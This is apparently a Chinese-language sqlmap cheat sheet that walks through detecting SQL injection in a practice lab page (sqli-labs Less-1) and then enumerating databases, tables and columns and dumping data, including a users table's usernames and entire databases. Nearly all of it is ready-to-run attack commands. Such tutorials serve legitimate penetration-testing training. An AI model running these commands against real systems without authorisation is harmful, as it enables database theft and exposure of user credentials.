@ZZHow(ZZHow1024)
一、扫描注入点
1.GET方法,给URL:
- #探测该url是否存在漏洞
sql
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"
- #如果我们已经知道admin这里是注入点的话,可以在其后面加个*来让sqlmap对其注入
sql
python sqlmap.py -u "http://www.xx.com/username/admin*"
2.POST方法,给抓包文件:
- #bp.txt是我们抓取的http的请求包
sql
python sqlmap.py -r bp.txt
- #指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测
sql
python sqlmap.py -r bp.txt -p username
二、爆基本信息自动化
0.查看当前的数据库
sql
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-db
1.爆出所有的数据库
sql
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" --dbs
2.爆出所有的数据表
sql
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" --tables
3.爆出数据库中所有的字段
sql
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" --columns
三、爆具体信息自动化
1.爆出数据库security中的所有的表
sql
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --tables
2.爆出security数据库中users表中的所有的字段
sql
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --columns
爆出数据库security中的users表中的username字段中的所有数据
sql
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -C username --dump
四、爆信数据自动化
1.爆出该数据库中的所有数据
sql
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" --dump-all
2.爆出数据库security中的所有数据
sql
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --dump-all
3.爆出数据库security中的users表中的所有数据
sql
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --dump-all